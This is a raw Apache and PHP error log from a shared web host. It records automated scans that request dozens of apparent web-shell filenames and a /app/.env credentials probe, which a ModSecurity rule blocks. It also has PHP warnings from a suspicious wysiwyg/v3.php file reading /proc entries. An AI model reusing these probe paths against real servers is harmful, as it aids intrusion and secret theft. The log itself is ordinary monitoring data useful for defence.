[Tue May 12 04:14:38.947817 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:39.053284 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:39.162265 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:39.267703 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:39.373138 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:39.481940 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:39.592424 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:39.803550 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:39.909171 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:40.014829 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:40.231144 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:40.336681 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:40.552075 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:40.882498 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:40.988137 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:41.093609 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:41.199047 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:41.308080 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:41.519086 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:41.838930 2026] [proxy_fcgi:error] [pid 1707624:tid 1707685] [client 20.9.31.235:20654] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:42.203815 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:42.312485 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:42.421086 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:42.531605 2026] [ssl:error] [pid 1730207:tid 1730226] (EAI 2)Name or service not known: [client 66.249.75.38:39806] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 04:14:42.531660 2026] [ssl:error] [pid 1730207:tid 1730226] AH01941: stapling_renew_response: responder error
[Tue May 12 04:14:42.767993 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:42.980898 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:43.087512 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:43.305926 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:43.650132 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:43.756727 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:43.865204 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:43.973583 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:44.187146 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:44.402858 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:44.514558 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:44.621033 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:44.727839 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:44.837371 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:44.944036 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:45.051429 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:45.161363 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:45.268010 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:45.375021 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:45.490669 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:45.597426 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:45.704185 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:45.810945 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:45.918319 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:46.030352 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:46.137562 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:46.257315 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:46.389609 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:46.513527 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:46.623132 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:46.730012 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:46.836691 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:46.957113 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:47.063850 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:47.170385 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:47.278652 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:47.385172 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:47.498296 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:14:47.610148 2026] [proxy_fcgi:error] [pid 1707624:tid 1707689] [client 20.9.31.235:20733] AH01071: Got error 'Primary script unknown'
PHP Warning:  filesize(): stat failed for /proc/106/task/106/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/106/task/106/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/106/task/106/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/106/task/106/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/106/task/106/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/106/task/106/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:15:34.374238 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/class-t.api.php
[Tue May 12 04:15:34.463465 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/zwso.php
[Tue May 12 04:15:34.662111 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/class19.php
[Tue May 12 04:15:34.746465 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/class20.php
[Tue May 12 04:15:34.835081 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/admin.php
[Tue May 12 04:15:34.921629 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/randkeyword.php
[Tue May 12 04:15:35.006336 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/fwe.php
[Tue May 12 04:15:35.176407 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/g.php
[Tue May 12 04:15:35.275921 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/tx1.php
[Tue May 12 04:15:35.360473 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/xv.php
[Tue May 12 04:15:35.444944 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/x56.php
[Tue May 12 04:15:35.546112 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/htaccess.php
[Tue May 12 04:15:35.633398 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/readme.php
[Tue May 12 04:15:35.720828 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/x50.php
[Tue May 12 04:15:35.809270 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/fv.php
[Tue May 12 04:15:35.893751 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/file.php
[Tue May 12 04:15:35.978196 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/lsd.php
[Tue May 12 04:15:36.064291 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/as.php
[Tue May 12 04:15:36.149253 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/wsd.php
[Tue May 12 04:15:36.235273 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/gtc.php
[Tue May 12 04:15:36.322988 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/atx.php
[Tue May 12 04:15:36.407658 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/z60.php
[Tue May 12 04:15:36.492373 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/403.php
[Tue May 12 04:15:36.577217 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/m.php
[Tue May 12 04:15:36.665016 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/themes.php
[Tue May 12 04:15:36.928403 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/click.php
[Tue May 12 04:15:37.013120 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/install.php
[Tue May 12 04:15:37.103677 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/lv.php
[Tue May 12 04:15:37.189084 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/simple.php
[Tue May 12 04:15:37.273586 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/css.php
[Tue May 12 04:15:37.367447 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/cong.php
[Tue May 12 04:15:37.538697 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/cong.php
[Tue May 12 04:15:37.627338 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/w.php
[Tue May 12 04:15:37.712048 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/404.php
[Tue May 12 04:15:37.796999 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/ioxi-o.php
[Tue May 12 04:15:37.912086 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/0x.php
[Tue May 12 04:15:37.999234 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/css.php
[Tue May 12 04:15:38.084100 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/222.php
[Tue May 12 04:15:38.257200 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/admin.php
[Tue May 12 04:15:38.447706 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/classwithtostring.php
[Tue May 12 04:15:38.536834 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/abcd.php
[Tue May 12 04:15:38.705365 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/autoload_classmap.php
[Tue May 12 04:15:38.790576 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/inputs.php
[Tue May 12 04:15:38.875243 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/about.php
[Tue May 12 04:15:38.959692 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/alfa.php
[Tue May 12 04:15:39.392123 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/manager.php
[Tue May 12 04:15:39.477348 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/item.php
[Tue May 12 04:15:39.673409 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/404.php
[Tue May 12 04:15:39.765797 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/mail.php
[Tue May 12 04:15:40.007552 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/sx.php
[Tue May 12 04:15:40.191887 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/alfa.php
[Tue May 12 04:15:40.284598 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/1.php
[Tue May 12 04:15:40.377316 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/byp.php
[Tue May 12 04:15:40.470478 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/wp-trackback.php
[Tue May 12 04:15:40.564818 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/.well-known/index.php
[Tue May 12 04:15:40.843619 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/gmo.php
[Tue May 12 04:15:41.028203 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/css/index.php
[Tue May 12 04:15:41.892134 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/ww1.php
[Tue May 12 04:15:42.185325 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/.well-known/acme-challenge/index.php
[Tue May 12 04:15:42.377372 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/security.php
[Tue May 12 04:15:43.055133 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/.well-known/admin.php
[Tue May 12 04:15:43.440669 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/.well-known/log.php
[Tue May 12 04:15:43.533650 2026] [:error] [pid 1808852:tid 1808871] [client 20.151.0.198:54637] File does not exist: /home/nearoofr/public_html/class.php
[Tue May 12 04:15:43.853379 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/bless5.php
[Tue May 12 04:15:44.157929 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/lock360.php
[Tue May 12 04:15:44.297697 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/f35.php
[Tue May 12 04:15:44.393622 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/ioxi-o1.php
[Tue May 12 04:15:44.493553 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/juuuu.php
[Tue May 12 04:15:44.591369 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/ha.php
[Tue May 12 04:15:44.658770 2026] [ssl:error] [pid 1808852:tid 1808859] [client 2.194.160.243:55928] AH02032: Hostname maelbailly.fr provided via SNI and hostname open.spotify.com provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 12 04:15:44.708646 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/gg.php
[Tue May 12 04:15:44.804671 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/we2.php
[Tue May 12 04:15:44.901511 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/04.php
[Tue May 12 04:15:44.999036 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/333.php
[Tue May 12 04:15:45.102004 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/520.php
[Tue May 12 04:15:45.198404 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/ar.php
[Tue May 12 04:15:45.322284 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/x.php
[Tue May 12 04:15:45.462558 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/xx.php
[Tue May 12 04:15:45.560147 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/gifclass4.php
[Tue May 12 04:15:45.656227 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/2clas.php
[Tue May 12 04:15:45.765700 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/ave.php
[Tue May 12 04:15:45.861517 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/wrt.php
[Tue May 12 04:15:45.960814 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/bibil.php
[Tue May 12 04:15:46.057663 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/radio.php
[Tue May 12 04:15:46.163202 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/files.php
[Tue May 12 04:15:46.258537 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/file7.php
[Tue May 12 04:15:46.354219 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/gifclass.php
[Tue May 12 04:15:46.545709 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/nox.php
[Tue May 12 04:15:46.660741 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/file48.php
[Tue May 12 04:15:46.756157 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/info.php
[Tue May 12 04:15:46.892824 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/class9.php
[Tue May 12 04:15:46.988877 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/la.php
[Tue May 12 04:15:47.085088 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/bless11.php
[Tue May 12 04:15:47.181280 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/ccou.php
[Tue May 12 04:15:47.276667 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/ton.php
[Tue May 12 04:15:47.377216 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/403.php
[Tue May 12 04:15:47.476077 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/file9.php
[Tue May 12 04:15:47.571601 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/ac.php
[Tue May 12 04:15:47.667762 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/new4.php
[Tue May 12 04:15:47.781111 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/pop.php
[Tue May 12 04:15:47.889301 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/az.php
[Tue May 12 04:15:47.995363 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/xaz.php
[Tue May 12 04:15:48.091716 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/up4.php
[Tue May 12 04:15:48.304138 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/1aa.php
[Tue May 12 04:15:48.399781 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/elp.php
[Tue May 12 04:15:48.498083 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/wtz.php
[Tue May 12 04:15:48.593489 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/galex.php
[Tue May 12 04:15:48.707719 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/xb.php
[Tue May 12 04:15:48.803275 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/ova.php
[Tue May 12 04:15:48.899188 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/vx.php
[Tue May 12 04:15:48.995368 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/rh.php
[Tue May 12 04:15:49.091203 2026] [:error] [pid 1707624:tid 1707695] [client 20.151.0.198:54605] File does not exist: /home/nearoofr/public_html/webindex.php
[Tue May 12 04:16:16.200024 2026] [security2:error] [pid 1730207:tid 1730221] [client 176.65.139.233:60770] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecorporatefinance.fr"] [uri "/app/.env"] [unique_id "agKNcDue9Sp-pIv_Bb6rBwAAAUw"]
[Tue May 12 04:16:16.200248 2026] [security2:error] [pid 1730207:tid 1730221] [client 176.65.139.233:60770] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecorporatefinance.fr"] [uri "/app/.env"] [unique_id "agKNcDue9Sp-pIv_Bb6rBwAAAUw"]
